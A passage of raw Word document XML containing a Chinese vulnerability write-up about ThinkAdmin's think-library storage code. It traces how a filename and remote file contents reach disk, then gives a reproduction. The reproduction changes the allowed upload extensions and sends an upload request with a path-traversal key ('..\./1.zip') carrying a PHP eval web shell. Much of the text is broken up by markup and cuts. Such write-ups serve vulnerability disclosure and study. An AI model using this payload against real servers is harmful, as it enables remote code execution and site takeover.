        </w:rPr>
        <w:t>行对文件目录进行查询</w:t>
      </w:r>
      <w:r w:rsidR="00D8760D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>是否已经有文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176B234" w14:textId="77777777" w:rsidR="00837112" w:rsidRDefault="001A557A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351</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行出现down函数跟进去到文件位置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A557A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/vendor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A557A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>zoujingli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A557A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/think-library/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A557A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A557A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A557A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Storage.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 86-180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行 down函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDD32A" w14:textId="77777777" w:rsidR="00A56619" w:rsidRDefault="00837112" w:rsidP="006D387B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837112">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CAAE9E4" wp14:editId="57105F68">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="2041215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15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89B" w14:textId="77777777" w:rsidR="00212AC3" w:rsidRDefault="00A56619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此函数注释为下载文件到本地</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27A3E7" w14:textId="77777777" w:rsidR="00303367" w:rsidRDefault="00212AC3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首先实例化一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00212AC3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="00303367">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00303367">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>然后使用name方法构造出filename变量 这个很重要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B636F4E" w14:textId="77777777" w:rsidR="00F7139B" w:rsidRDefault="00303367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位置在相同文件下的7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2-77</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00303367">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D003D1" wp14:editId="065A2246">
            <wp:extent cx="5274310" cy="987425"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="185875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58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8F5B" w14:textId="77777777" w:rsidR="00AD0053" w:rsidRDefault="00F7139B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行又对文件是否已经存在进行判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75389C0F" w14:textId="242A157A" w:rsidR="00AD0053" w:rsidRDefault="00AD0053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96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行出现set函数跟随进去看一下</w:t>
      </w:r>
      <w:r w:rsidR="007F4189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传入的参数为filename和远程拉取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F4189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidR="007F4189">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_icon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00830A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00830A4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F4189">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E30B9A" w14:textId="77777777" w:rsidR="00AD0053" w:rsidRDefault="00AD0053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文件位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D991B" w14:textId="77777777" w:rsidR="00AD0053" w:rsidRDefault="00AD0053" w:rsidP="006D387B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/vendor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>zoujingli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/think-library/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/storage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LocalStorage.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AE69F10" w14:textId="4FC60C39" w:rsidR="00AD0053" w:rsidRDefault="00AD0053" w:rsidP="006D387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0-71</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AEED37" w14:textId="77777777" w:rsidR="00AD0053" w:rsidRDefault="00AD0053" w:rsidP="006D387B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD0053">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492708A2" wp14:editId="550753C6">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1335640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40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F0" w14:textId="69D70B42" w:rsidR="00A35567" w:rsidRPr="007B015A" w:rsidRDefault="007F4189" w:rsidP="007B015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此处</w:t>
      </w:r>
      <w:r w:rsidR="006C56FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>可以看到其使用传入进来的filename变量和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C56FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidR="006C56FE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_icon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C56FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C56FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C56FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件内容写入文件</w:t>
      </w:r>
      <w:r w:rsidR="007B015A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B015A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>至此漏洞发生</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1B915" w14:textId="77777777" w:rsidR="0058204A" w:rsidRDefault="004F3039" w:rsidP="004F3039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复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030318D2" w14:textId="679D0964" w:rsidR="008125A6" w:rsidRPr="00861864" w:rsidRDefault="0058204A" w:rsidP="0058204A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058204A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞一复现</w:t>
      </w:r>
      <w:r w:rsidR="004F3039" w:rsidRPr="0058204A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E53105">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在官网进行composer</w:t>
      </w:r>
      <w:r w:rsidR="00E53105">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E53105">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidR="00D74D0C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E2787C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>安装后登录进入后台</w:t>
      </w:r>
      <w:r w:rsidR="00E2787C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E2787C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>首先对后台设置可上传后缀</w:t>
      </w:r>
      <w:r w:rsidR="00E2787C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E2787C" w:rsidRPr="00E2787C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21817E84" wp14:editId="1EE05736">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="788182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2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2AB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002452AB">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="002452AB" w:rsidRPr="00FB0E49">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r w:rsidR="002452AB" w:rsidRPr="00FB0E49">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="eastAsia"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>localhost</w:t>
        </w:r>
        <w:r w:rsidR="002452AB" w:rsidRPr="00FB0E49">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>/admin/config/storage.html?spm=m-1-2-3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002452AB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="303942"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002452AB">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="eastAsia"/>
          <w:color w:val="303942"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>param</w:t>
      </w:r>
      <w:r w:rsidR="0075599E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:hint="eastAsia"/>
          <w:color w:val="303942"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002452AB">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>storage%5Bname_type%5D=xmd5&amp;storage%5Blink_type%5D=none&amp;storage%5Ballow_exts%5D=doc%2Cgif%2Cico%2Cjpg%2Cmp3%2Cmp4%2Cp12%2Cpem%2Cpng%2Czip%2Crar%2Cxls%2Cxlsx%2Chtaccess%2Cini&amp;storage%5Blocal_http_protocol%5D=follow&amp;storage%5Blocal_http_domain%5D=&amp;storage%5Btype%5D=local</w:t>
      </w:r>
      <w:r w:rsidR="00B21D52">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B21D52" w:rsidRPr="00B21D52">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FCDDC79" wp14:editId="1985B409">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1419356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56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77E" w14:textId="01A6F1E6" w:rsidR="00861864" w:rsidRDefault="007B5FFF" w:rsidP="00861864">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:noProof/>
          <w:color w:val="5A5A5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424E" wp14:editId="05463BD1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>228600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>464820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5219700" cy="3055620"/>
                <wp:effectExtent l="0" t="0" r="12700" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="2635978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DD2E7" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864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  <w:t>POST /admin/api.upload/file HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7190A73B" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864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  <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="556C6EEE" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864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Cookie: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B5FFF">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>用户</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B5FFF">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>cookie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3BE87AE6" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864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Host: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B5FFF">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>IP</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B5FFF">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>：</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B5FFF">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="13"/>
                                <w:szCs w:val="13"/>
                              </w:rPr>
                              <w:t>PORT</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3E9EDFDB" w14:textId="77777777" w:rsidR="002B19D2" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864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</w:rPr>
                              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B5FFF"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Pr="007B5FFF">
                              <w:rPr>
                                <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
                                <w:color w:val="000000" w:themeColor="text1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="002B19D2"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6FFEB1B1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Content-Disposition: form-data; name="key"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18F3CB0A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5BC0FC26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..\./1.zip</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="15961C84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3AD0BE35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Content-Disposition: form-data; name="safe"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="751DD151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13F3F701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  <w:p w14:paraId="1157AE78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6BCCE18C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Content-Disposition: form-data; name="uptype"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2DF59B4A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42534138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local</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0EF9EB4C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24C46FF1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Content-Disposition: form-data; name="file"; filename="1.zip"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1F074645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Content-Type: image/png</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="751F971C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57F50967" w14:textId="77777777" w:rsidR="002B19D2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&lt;?php @eval($_POST[1]);?&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="017FD32E" w14:textId="6E769466" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="002B19D2" w:rsidP="002B19D2">
                            <w:pPr>
                              <w:spacing w:line="180" w:lineRule="exac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B5FFF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------WebKitFormBoundary3VyVEPpvQynFo76H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342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pt;margin-top:36.6pt;width:411pt;height:24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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="31FDD2E7" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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  <w:t>POST /admin/api.upload/file HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7190A73B" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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  <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="556C6EEE" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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  <w:t xml:space="preserve">Cookie: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B5FFF">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>用户</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B5FFF">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>cookie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3BE87AE6" w14:textId="77777777" w:rsidR="00861864" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864" w:rsidP="00861864">
                      <w:pPr>
                        <w:spacing w:line="180" w:lineRule="exact"/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  <w:t xml:space="preserve">Host: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B5FFF">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>IP</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B5FFF">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>：</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B5FFF">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo" w:hint="eastAsia"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="13"/>
                          <w:szCs w:val="13"/>
                        </w:rPr>
                        <w:t>PORT</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3E9EDFDB" w14:textId="77777777" w:rsidR="002B19D2" w:rsidRPr="007B5FFF" w:rsidRDefault="00861864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</w:rPr>
                        <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36</w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B5FFF"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Pr="007B5FFF">
                        <w:rPr>
                          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
                          <w:color w:val="000000" w:themeColor="text1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="002B19D2"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6FFEB1B1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Content-Disposition: form-data; name="key"</w:t>
                      </w:r>
                    </w:p>
